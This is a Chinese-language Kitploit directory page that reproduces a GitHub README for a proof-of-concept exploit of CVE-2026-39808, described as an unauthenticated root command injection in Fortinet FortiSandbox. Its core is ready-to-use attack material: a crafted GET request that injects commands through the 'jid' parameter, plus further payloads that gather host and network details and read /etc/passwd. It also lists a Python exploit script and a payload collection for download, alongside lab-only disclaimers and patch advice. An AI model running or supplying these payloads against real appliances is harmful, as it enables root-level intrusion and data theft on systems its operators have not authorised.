Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-39808
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育Payload 开发实验室与实践
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

查看仓库
2244个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 FortiSandbox Root 沙箱逃逸 - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 概述

本仓库包含针对 CVE-2026-39808 的清晰且文档完善的 Proof of Concept(概念验证)——这是 Fortinet FortiSandbox 中一个严重的未认证命令注入漏洞,可实现沙箱逃逸,并以 root(uid=0)权限远程执行代码。

此 PoC 演示的内容:

  • 通过 jid 参数实现路径遍历 + 命令注入
  • 从分析环境中逃逸沙箱
  • 以 root 权限执行任意命令
  • 读取系统文件和网络信息

📸 演示

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

成功利用,显示 uid=0 gid=0 groups=0


🚀 受影响版本

版本范围状态
FortiSandbox 4.4.0 – 4.4.8存在漏洞
FortiSandbox 5.0.0 – 5.0.5存在漏洞
4.4.9+ / 5.0.6+已修复

🛠️ 使用方法(仅限实验室)

1. 简单 Payload(推荐)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. 查看结果

在浏览器中打开:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. 高级 Payload 示例

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 仓库内容

  • poc.py → 自动化 Python 利用脚本
  • burp-request.txt → 可直接使用的 Burp Suite 请求
  • payloads.md → 常用 payload 集合
  • screenshots/ → 分步利用过程截图
  • README.md → 本文件

⚠️ 重要说明

  • 仅供教育和实验室用途
  • 请勿在任何生产系统或未授权系统上使用
  • 测试前务必获得适当授权
  • 请将 FortiSandbox 修补至 4.4.9+ 或 5.0.6+ 版本

🛡️ 缓解措施

请立即将 FortiSandbox 更新至以下版本之一:

  • 4.4.9 或更高版本
  • 5.0.6 或更高版本

Fortinet 已发布针对此漏洞的官方补丁。


仅供研究与学习目的
⭐ 如果此仓库对你有帮助,请为它点个 Star!

下载工具